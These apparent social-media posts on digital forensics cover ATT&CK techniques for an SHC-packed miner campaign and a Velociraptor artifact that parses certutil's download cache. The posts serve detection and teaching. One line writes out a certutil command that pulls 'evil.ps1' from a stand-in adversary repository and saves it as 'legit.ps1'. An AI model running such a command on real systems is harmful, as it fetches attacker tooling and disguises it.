From a #ThreatIntelligence perspective, the #TTPs would be:

- #T1059.003: Command and Scripting Interpreter: Unix Shell. SHC payloads to be run still need a shell to be identified in the system and that the code inside the payload is, in fact, a shell script.
- #T1027.002: Obfuscated Files or Information: Software Packed with #SHC.
- #T1622: Debugger Evasion by using SHC with '-r'.
- #T1105: Ingress Tool Transfer by downloading payloads from Github.
- #T1496: Resource Hijacking with #XMRig.

🦖Day 57 of the
@velocidex
#velociraptor #ArtifactsOfAutumn series

Artifact: Windows[.]Forensics[.]CertUtil

Link: https://docs.velociraptor.app/artifact_references/pages/windows.forensics.certutil/

CertUtil is a built-in tool used to manage certificates on Windows systems.

It can be used to for living off of the land through (base64) decoding/encoding data, calculating file hashes, and downloading files from the internet.

https://attack.mitre.org/techniques/T1105/
https://attack.mitre.org/techniques/T1140/

This can be useful for an attacker trying to hide their intentions and/or faciliate tool transfer for lateral movement and persistence. Last, certutil can also be used for installing browser root certificates to allow for AiTM/MiTM attacks.

#T1105
#T1140

In the past, certutil has been used maliciously by the following groups:

- APT28
- APT41
- Rancor
- Turla
- and others

#S0160
https://attack.mitre.org/software/S0160/

Certutil maintains a cache of downloaded files. This cache can contain valuable metadata.

This artifact parses the metadata within the certutil cache to establish what was downloaded, and when it was downloaded.

In this instance (shown in the image), a file called 'evil.ps1' was downloaded. 👀

The following command was run to generate this output:

'certutil -urlcache -split -f https://raw.githubusercontent.com/ExampleAdversary/scripts/main/evil.ps1 legit.ps1'

You can use the following ART test (maybe with other options, such as 'verifyctl') if you would like to test this artifact yourself:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md#atomic-test-7---certutil-download-urlcache

As mentioned previously, certutil can be also used for other operations such as decoding/encoding data.

You can also try the following ART test to experiment with this functionality:

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md#atomic-test-2---certutil-rename-and-decode

That's it for now! Stay tuned to learn about more artifacts! 🦖

Also, check out the link below for a blog that analyzes the various artifacts left from certutil usage!

u0041.co/blog/post/3